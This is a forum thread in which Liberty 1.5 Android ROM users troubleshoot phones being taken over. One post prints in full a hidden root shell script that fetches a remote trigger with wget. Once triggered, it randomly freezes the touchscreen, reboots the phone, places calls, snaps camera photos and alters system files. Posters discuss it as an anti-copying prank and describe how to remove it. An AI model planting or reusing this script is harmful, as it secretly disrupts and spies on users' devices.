Liberty 1.5 takes over my phone?

Status
Not open for further replies.

FTW

New Member
Joined
Feb 15, 2011
Messages
2
Reaction score
0
Pull the SD card out reboot, go into any file manager and go to

/system/lib/libgnakfoorp.so
delete that file and you are good.

Mine's doing this same thing. What makes you think it's this file? Why is the phone doing this in the first place?
 

jangle

New Member
Joined
Aug 26, 2010
Messages
13
Reaction score
0
Because I know linux well enough to know what to search for.

Only happens when an SD card is mounted.
In the Liberty folder is a .so file (A script designed to run when mounted)
That script opens a Super user terminal, and runs that file I mentioned from the system folder.
The .so in the system folder says the following
# Why? 99% because it was fun as hell to make. 1% to mess with people's minds who try and remove credit :p

SLEEP_TIME=3m
URL=http://www.froyoroms.com/files/developers/jrummy/JRummy/testing/kangtest
GNAK=1
BB=busybox
CHECK_POINT=/data/gnak
OPTIONS=/data/.gnaksnoitpo
PHONE_NUMBER=411

gnak()
{
if test ! -e /system/etc/product_of_liberty; then
while test -z "$(mount | $BB grep /sdcard)"; do
sleep 5s
done
$BB sleep $SLEEP_TIME;
sleep 3s;
$BB wget $URL -O $CHECK_POINT > /dev/nul 2>&1
if test "`cat $CHECK_POINT`" = "$GNAK"; then
sed -i 's|ROM version |KANG version|' /system/app/Settings.apk
listOptions
OPTION_COUNT=$($BB wc -l < $OPTIONS)
if test $OPTION_COUNT -gt 0; then
RANDOM=$($BB hexdump -e '1/1 "%d"' -n 1 /dev/urandom)
GNAK_NUB=$(($RANDOM % $OPTION_COUNT + 1))
GNAK_FOORP=$($BB sed -n "${GNAK_NUB}"p $OPTIONS)
NRAEL_TON_OT_GNAK=`echo $GNAK_FOORP | $BB sed 's/_/ /g'`
$NRAEL_TON_OT_GNAK
else
freezeIt
googleIt wtf is going on
fi
fi
fi
}

inputText() {
for word in "$@"; do
input text $word
input keyevent 62
done
}

googleIt()
{
freezeIt
am start -a android.intent.action.VIEW -d Google
sleep 10s
input keyevent 84
sleep 1s
inputText $@
input keyevent 66
}

powerDown()
{
case $1 in
bs) > /data/.recovery_mode;reboot;;
rc) reboot recovery;;
pd) reboot -p;;
rb) reboot;;
esac
}

freezeIt()
{
echo 1 > /sys/module/qtouch_obp_ts/parameters/disable_touch
}

lcdMess()
{
case $1 in
tiny) sed -i 's|.*ro.sf.lcd_density=.*|ro.sf.lcd_density=170|' /system/build.prop;reboot;;
big) sed -i 's|.*ro.sf.lcd_density=.*|ro.sf.lcd_density=280|' /system/build.prop;reboot;;
esac
}

takePicture()
{
while sleep 30m; do
am start -a android.intent.action.MAIN -n com.motorola.Camera/.Camera
sleep 2
input keyevent 27
done
}

pulldownBar()
{
while test "this" != "fun"; do
input keyevent 83
done
}

homeScreen()
{
while sleep 60s; do
input keyevent 3
done
}

callSomeone()
{
am start -a android.intent.action.CALL tel:$PHONE_NUMBER
}

soundAnnoy()
{
A=0
B=0
while sleep 2s; do
while test $A -ne 10; do
input keyevent 24
A=$(($A+1))
done
A=0
while test $B -ne 10; do
input keyevent 25
B=$(($B+1))
done
B=0
done
}

listOptions()
{
cat > $OPTIONS << GNAK
googleIt_urban_dictionary_kang
googleIt_urban_dictionary_kang
googleIt_liberty_rom_android
googleIt_liberty_rom_android
soundAnnoy
soundAnnoy
powerDown_bs
powerDown_rc
powerDown_pd
powerDown_rb
pulldownBar
pulldownBar
pulldownBar
pulldownBar
homeScreen
homeScreen
callSomeone
freezeIt
freezeIt
takePicture
takePicture
lcdMess_tiny
lcdMess_big
GNAK
}

# yb: 61ymmurj
 

jangle

New Member
Joined
Aug 26, 2010
Messages
13
Reaction score
0
That and when I deleted those two files it stopped doing that....
 

dirtyfingers

Member
Joined
Dec 20, 2010
Messages
206
Reaction score
1
Location
Wisconsin
I think that is jrummy messing with people who try to remove credit or something like that.

Sent from my DROIDX using Tapatalk
 

spaz33g

Rescue Squad
Rescue Squad
Joined
Sep 4, 2010
Messages
6,368
Reaction score
0
Location
orange county, ca
There was a guy that posted a "modified" liberty on xda a while back iirc. Wonder if this has anything to do with that.

tappin and a talkin
 

jangle

New Member
Joined
Aug 26, 2010
Messages
13
Reaction score
0
I am reading/searching all the .so files on the card and phone now with a search on my linux computer to find the exact one that is doing it.
 

jangle

New Member
Joined
Aug 26, 2010
Messages
13
Reaction score
0
Yeah it is about that, but I have the 1.5 version from xda and it was doing it still... sure it is related, what Theme were you all using? Could be the link and give me something to look for
 

holmes6

Member
Joined
Nov 1, 2010
Messages
139
Reaction score
0
Location
New England Patriots
ouch
this is a reminder that you are trusting some 3rd party code and running it as root on your phone..
be happy the hack appears to be benign and doesn't hose your data or commit some crime on your connection

p.s. I highly doubt the official liberty team or anyone who puts their name out there like Jrummy is responsible.
 

droidzforlife

Beta Alpha Delta Omega 3!
Premium Member
Theme Developer
Joined
Nov 16, 2010
Messages
256
Reaction score
0
Location
Salt Lake City, Utah
Website
www.wix.com
So this just happened to me out of nowhere ? I have had the same Liberty.zip since the second it came out on this forum so I dont know how it would just end up getting it.

Should I download another Liberty zip and look for that .so file before I install it ?
 

spaz33g

Rescue Squad
Rescue Squad
Joined
Sep 4, 2010
Messages
6,368
Reaction score
0
Location
orange county, ca
It's possible that jrummy threw it in there bit didn't intend for it to affect end users.

tappin and a talkin
 

snot

Member
Joined
Aug 4, 2010
Messages
44
Reaction score
0
Location
Orange County, CA
Liberty is known for non responsive ness its locks ur phone and wont allow u to turn it on most of the time when it does it ur phone reboots I say try new apex 1.4 or UD 3.0.0 way more responsive and NO LAG! also battery life is just amazing on both

Sent from my DROIDX using DroidForums App

UD 3.0 is not released for DX yet....
 
Status
Not open for further replies.
Top